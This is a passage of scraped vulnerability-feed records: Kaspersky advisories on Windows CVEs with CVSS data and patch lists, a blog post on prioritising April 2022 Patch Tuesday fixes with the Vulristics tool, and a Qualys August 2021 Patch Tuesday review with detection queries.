\n[5007186](<http://support.microsoft.com/kb/5007186>) \n[5007192](<http://support.microsoft.com/kb/5007192>) \n[5007215](<http://support.microsoft.com/kb/5007215>) \n[5007205](<http://support.microsoft.com/kb/5007205>) \n[5007245](<http://support.microsoft.com/kb/5007245>) \n[5007247](<http://support.microsoft.com/kb/5007247>) \n[5007189](<http://support.microsoft.com/kb/5007189>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-09T00:00:00", "type": "kaspersky", "title": "KLA12345 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42286", "CVE-2021-42287", "CVE-2021-42288", "CVE-2021-42291"], "modified": "2023-09-28T00:00:00", "id": "KLA12345", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12345/", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:57:59", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, 
version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36948](<https://nvd.nist.gov/vuln/detail/CVE-2021-36948>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-26433](<https://nvd.nist.gov/vuln/detail/CVE-2021-26433>) \n[CVE-2021-36945](<https://nvd.nist.gov/vuln/detail/CVE-2021-36945>) \n[CVE-2021-26432](<https://nvd.nist.gov/vuln/detail/CVE-2021-26432>) \n[CVE-2021-36926](<https://nvd.nist.gov/vuln/detail/CVE-2021-36926>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34487](<https://nvd.nist.gov/vuln/detail/CVE-2021-34487>) \n[CVE-2021-34530](<https://nvd.nist.gov/vuln/detail/CVE-2021-34530>) \n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n[CVE-2021-34534](<https://nvd.nist.gov/vuln/detail/CVE-2021-34534>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34486](<https://nvd.nist.gov/vuln/detail/CVE-2021-34486>) \n[CVE-2021-36932](<https://nvd.nist.gov/vuln/detail/CVE-2021-36932>) \n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) \n[CVE-2021-26431](<https://nvd.nist.gov/vuln/detail/CVE-2021-26431>) \n[CVE-2021-26426](<https://nvd.nist.gov/vuln/detail/CVE-2021-26426>) \n[CVE-2021-34536](<https://nvd.nist.gov/vuln/detail/CVE-2021-34536>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) 
\n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36933](<https://nvd.nist.gov/vuln/detail/CVE-2021-36933>) \n[CVE-2021-36938](<https://nvd.nist.gov/vuln/detail/CVE-2021-36938>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[4023814](<http://support.microsoft.com/kb/4023814>) \n[5005036](<http://support.microsoft.com/kb/5005036>) \n[5005031](<http://support.microsoft.com/kb/5005031>) \n[5005033](<http://support.microsoft.com/kb/5005033>) \n[5005030](<http://support.microsoft.com/kb/5005030>) \n[5005106](<http://support.microsoft.com/kb/5005106>) \n[5005040](<http://support.microsoft.com/kb/5005040>) \n[5005099](<http://support.microsoft.com/kb/5005099>) \n[5005043](<http://support.microsoft.com/kb/5005043>) \n[5005076](<http://support.microsoft.com/kb/5005076>) \n[5005094](<http://support.microsoft.com/kb/5005094>) \n[5011535](<http://support.microsoft.com/kb/5011535>) \n[5011564](<http://support.microsoft.com/kb/5011564>) \n[5011560](<http://support.microsoft.com/kb/5011560>) \n[5011527](<http://support.microsoft.com/kb/5011527>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": "KLA12259 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36945", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-10-18T00:00:00", "id": "KLA12259", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12259/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-04-23T12:23:39", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for April 2022 and new improvements in my [Vulristics](<https://github.com/leonov-av/vulristics>) project. I decided to add more comment sources. Because it's not just Tenable, Qualys, Rapid7 and ZDI make Microsoft Patch Tuesday reviews, but also other security companies and bloggers. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239085>\n\nYou can see them in my automated security news telegram channel [avleonovnews](<https://t.me/avleonovnews>) after every second Tuesday of the month. 
So, now you can add any links with CVE comments to Vulristics.\n\nFor April Patch Tuesday I will add these sources:\n\n * [Kaspersky](<https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/>)\n * [KrebsOnSecurity](<https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/>)\n * [ComputerWeekly](<https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs>)\n * [TheHackersNews](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>)\n * [Threatpost](<https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/>)\n\nLet's see if they highlight different sets of vulnerabilities.\n \n \n $ cat comments_links.txt\n Qualys|April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday\n ZDI|THE APRIL 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review\n Kaspersky|A bunch of vulnerabilities in Windows, one already exploited|https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/\n KrebsOnSecurity|Microsoft Patch Tuesday, April 2022 Edition|https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/\n ComputerWeekly|Microsoft patches two zero-days, 10 critical bugs|https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs\n TheHackersNews|Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities|https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html\n Threatpost|Microsoft Zero-Days, Wormable Bugs Spark Concern|https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/\n\nI have also added links to [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday>) and 
[ZDI](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) blogposts. Qualys didn't fix their blog search (apparently no one uses it). ZDI don't have a blog search, and duckduckgo stopped indexing them properly. \n\nIn addition, Tenable closed access to their [tenable.com](<http://tenable.com>). This is rather ironic considering that [Russian Tenable Security Day](<https://tenable-day.tiger-optics.ru/>) took place on February 10, 2022, just two months ago. [I participated in it](<https://www.youtube.com/watch?v=V5T3ftcFwdY>). It was a formal event with [Tenable's EMEA CTO and Regional Manager](<https://t.me/avleonovcom/961>). And now we are not talking about any support, updates and licenses for Russian companies and individuals, but even about access to the Tenable website. This is how the situation can change rapidly, if you trust Western vendors. Try not to do this.\n\nBut in any case, you can still use the Tenable blog as a source of comments about Patch Tuesday vulnerabilities. I have added socks proxy support to Vulristics.\n \n \n vulners_key = \"SFKJKEWRID2JFIJ...AAK3DHKSJD\"\n proxies = {\n 'http': \"socks5://<host>:<port>\",\n 'https': \"socks5://<host>:<port>\"\n }\n\nI run the command like this:\n \n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"April\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n\nJust like last month, I'm taking into account not only the vulnerabilities published on April 11 (117 CVEs), but also all the vulnerabilities since last Patch Tuesday (40 CVEs). 
There are a total of 157 CVEs in the report.\n \n \n MS PT Year: 2022\n MS PT Month: April\n MS PT Date: 2022-04-12\n MS PT CVEs found: 117\n Ext MS PT Date from: 2022-03-09\n Ext MS PT Date to: 2022-04-11\n Ext MS PT CVEs found: 40\n ALL MS PT CVEs: 157\n\n * Critical: 5\n * High: 51\n * Medium: 91\n * Low: 10\n\nLet's start with the critical ones:\n\n * **Elevation of Privilege** - Windows Common Log File System Driver ([CVE-2022-24521](<https://vulners.com/cve/CVE-2022-24521>)). Exploitation in the wild is mentioned in AttackerKB and Microsoft. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Functional Exploit). Since this vulnerability only allows a privilege escalation, it is likely paired with a separate code execution bug. This vulnerability was reported by the US National Security Agency.\n * **Remote Code Execution** - Remote Procedure Call Runtime ([CVE-2022-26809](<https://vulners.com/cve/CVE-2022-26809>)). An unauthenticated, remote attacker could exploit this vulnerability by sending \u201ca specially crafted RPC call to an RPC host.\u201d The vulnerability could allow a remote attacker to execute code at high privileges on an affected system. Since no user interaction is required, these factors combine to make this wormable, at least between machines where RPC can be reached. A proof of concept of this vulnerability [is available on github](<https://github.com/XmasSnow1/cve-2022-26809>). Other RCEs in RPC ([CVE-2022-24492](<https://vulners.com/cve/CVE-2022-24492>), [CVE-2022-24528](<https://vulners.com/cve/CVE-2022-24528>)) were also classified as Critical, but this is due to misattribution of exploits. The only exploitable one is [CVE-2022-26809](<https://vulners.com/githubexploit/706a6eeb-1d07-53eb-8455-f7809863dadc>). \n * **Remote Code Execution** - Microsoft Edge ([CVE-2022-1096](<https://vulners.com/cve/CVE-2022-1096>)). 
In the Vulristics report it was detected as **Unknown Vulnerability Type** because it's impossible to detect the vulnerability type from the description. "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information. Google is aware that an exploit for CVE-2022-1096 exists in the wild." In fact it is a well-known 0day RCE in Chrome that affected all other Chromium-based browsers. Exploitation in the wild is mentioned in AttackerKB. The Vulristics report states that "Public exploit is found at Vulners". However, it's just a "Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096". Yes, it is difficult to determine what exactly was uploaded on github.\n\nNow let's see the most interesting vulnerabilities with the High level.\n\n * **Elevation of Privilege** - Windows User Profile Service ([CVE-2022-26904](<https://vulners.com/cve/CVE-2022-26904>)). This vulnerability was supposed to have been fixed in the August 2021 update, when it was tracked as CVE-2021-34484. However, the researcher who discovered it later discovered a bypass, and then when that was fixed again in January, he went and bypassed it a second time. Not only is PoC out there for it, there\u2019s a [Metasploit module](<https://vulners.com/metasploit/msf:exploit/windows/local/cve_2022_26904_superprofile/>) as well. This privilege escalation vulnerability allows an attacker to gain code execution at SYSTEM level on affected systems. The vulnerability relies on winning a race condition, which can be tricky to reliably achieve.\n * **Information Disclosure** - Windows Kernel ([CVE-2022-24483](<https://vulners.com/cve/CVE-2022-24483>)). 
Little is known about this vulnerability and no one has highlighted this vulnerability, but there is a [PoC for it on github](<https://github.com/waleedassar/CVE-2022-24483>).\n * **Remote Code Execution** - Windows DNS Server ([CVE-2022-26812](<https://vulners.com/cve/CVE-2022-26812>), [CVE-2022-26814](<https://vulners.com/cve/CVE-2022-26814>), [CVE-2022-26829](<https://vulners.com/cve/CVE-2022-26829>)). Also, no one highlighted this vulnerability. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Proof-of-Concept Exploit). There were 18(!) DNS Server bugs receiving patches this month.\n\nFor the remaining vulnerabilities, there is neither a sign of exploitation in the wild, nor a sign of a public exploit. Let's see the most interesting ones.\n\n * **Remote Code Execution** - Windows SMB ([CVE-2022-24500](<https://vulners.com/cve/CVE-2022-24500>)). This vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. Exploitability Assessment: Exploitation Less Likely. **Remote Code Execution** - Windows Kernel ([CVE-2022-24541](<https://vulners.com/cve/CVE-2022-24541>)) is actually a similar SMB vulnerability as well.\n * **Remote Code Execution** - Windows Network File System ([CVE-2022-24491](<https://vulners.com/cve/CVE-2022-24491>), [CVE-2022-24497](<https://vulners.com/cve/CVE-2022-24497>)). An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: This vulnerability is only exploitable for systems that have the NFS role enabled. 
Exploitability Assessment: Exploitation More Likely.\n\nAs you can see, additional sources of comments actually repeat everything that ZDI, Qualys, Rapid7 and Tenable highlight, but sometimes they add interesting details about vulnerabilities.\n\nThe full report is available: [ms_patch_tuesday_april2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-23T09:22:32", "type": "avleonov", "title": "Microsoft Patch Tuesday April 2022 and custom CVE comments sources in Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-1096", "CVE-2022-24483", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24528", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26812", "CVE-2022-26814", "CVE-2022-26829", "CVE-2022-26904"], "modified": "2022-04-23T09:22:32", "id": "AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692", "href": 
"https://avleonov.com/2022/04/23/microsoft-patch-tuesday-april-2022-and-custom-cve-comments-sources-in-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-08-21T10:10:11", "description": "### Microsoft Patch Tuesday \u2013 August 2021\n\nMicrosoft patched 51 vulnerabilities in their August 2021 Patch Tuesday release, and 7 of them are rated as critical severity. Three 0-day vulnerability patches were included in the release.\n\n#### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n\nAn unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM. A malicious user can use this attack to take complete control over the Windows domain. Per Microsoft, this vulnerability affects all servers, but domain controllers should be prioritized in terms of applying security updates.\n\n[CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>) \u2013 Windows Print Spooler Remote Code Execution Vulnerability\n\nA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. 
This Patch Tuesday Microsoft released security updates to address this vulnerability and should be prioritized.\n\n#### Three 0-Day Vulnerabilities Patched\n\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>) - Windows Print Spooler Remote Code Execution Vulnerability\n * [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>) - Windows Update Medic Service Elevation of Privilege Vulnerability - This has been actively exploited, per Microsoft.\n\n#### Qualys QIDs Providing Coverage\n\n**QID**| **Title**| **Severity**| **CVE ID** \n---|---|---|--- \n110388| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities August 2021| Medium| [_CVE-2021-36940_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36940>) \n110389| Microsoft Office and Microsoft Office Services and Web Apps Security Update August 2021 | High| [_CVE-2021-34478_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34478>), [_CVE-2021-36941_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36941>) \n375798| Microsoft Azure CycleCloud Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-33762_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33762>), [_CVE-2021-36943_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36943>), [_KB3142345_](<https://www.microsoft.com/en-us/download/details.aspx?id=103313>) \n91801| Microsoft Dynamics Business Central Cross-Site (XSS) Scripting Vulnerability August 2021 | Medium | [_CVE-2021-36946_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36946>) \n91802| Microsoft Windows Security Update for August 2021 \n \n | High| CVE-2021-26424, [_CVE-2021-26425_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26425>), 
[_CVE-2021-26426_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26426>), [_CVE-2021-26431_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26431>), [_CVE-2021-26432_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26432>), [_CVE-2021-26433_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26433>), [_CVE-2021-34480_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34480>), [_CVE-2021-34483_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34483>), [_CVE-2021-34484_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34484>), [_CVE-2021-34486_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34486>), [_CVE-2021-34487_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34487>), [_CVE-2021-34530_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34530>), [_CVE-2021-34533_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34533>), [_CVE-2021-34534_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34534>), [_CVE-2021-34535_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34535>), [_CVE-2021-34536_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34536>), [_CVE-2021-34537_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34537>), [_CVE-2021-36926_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36926>), [_CVE-2021-36927_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36927>), [_CVE-2021-36932_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36932>), [_CVE-2021-36933_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36933>), [_CVE-2021-36936_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36936>), [_CVE-2021-36937_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36937>), [_CVE-2021-36938_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36938>), [_CVE-2021-36947_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36947>), 
[_CVE-2021-36948_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36948>) \n91803| Microsoft Windows Local Security Authority (LSA) Spoofing Vulnerability August 2021 | High| [_CVE-2021-36942_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36942>) \n91804| Microsoft Windows Defender Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-34471_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34471>) \n91805| Microsoft Windows 10 Update Assistant Elevation of Privilege Vulnerability August 2021 | Medium | [_CVE-2021-36945_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36945>) \n91806| Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability August 2021 | Medium| [_CVE-2021-36949_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36949>) \n91774| Microsoft .NET Core and ASP.NET Core Security Update for August 2021 | High| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n91809| Microsoft Visual Studio Security Update for August 2021 | Medium| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n \n### Adobe Patch Tuesday \u2013 August 2021\n\nAdobe addressed 29 CVEs this Patch Tuesday impacting Adobe Connect and Magento product. 
The patches for Magento are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\n**Adobe Security Bulletin**| **QID**| **Severity**| **CVE ID** \n---|---|---|--- \nAdobe Connect Multiple Vulnerabilities (APSB21-66) | 730152| Medium| [CVE-2021-36061](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36061>), [CVE-2021-36062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36062>), [CVE-2021-36063](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36063>) \n \n### Discover Patch Tuesday Vulnerabilities in VMDR\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all of your hosts impacted by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Vulnerabilities and Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This 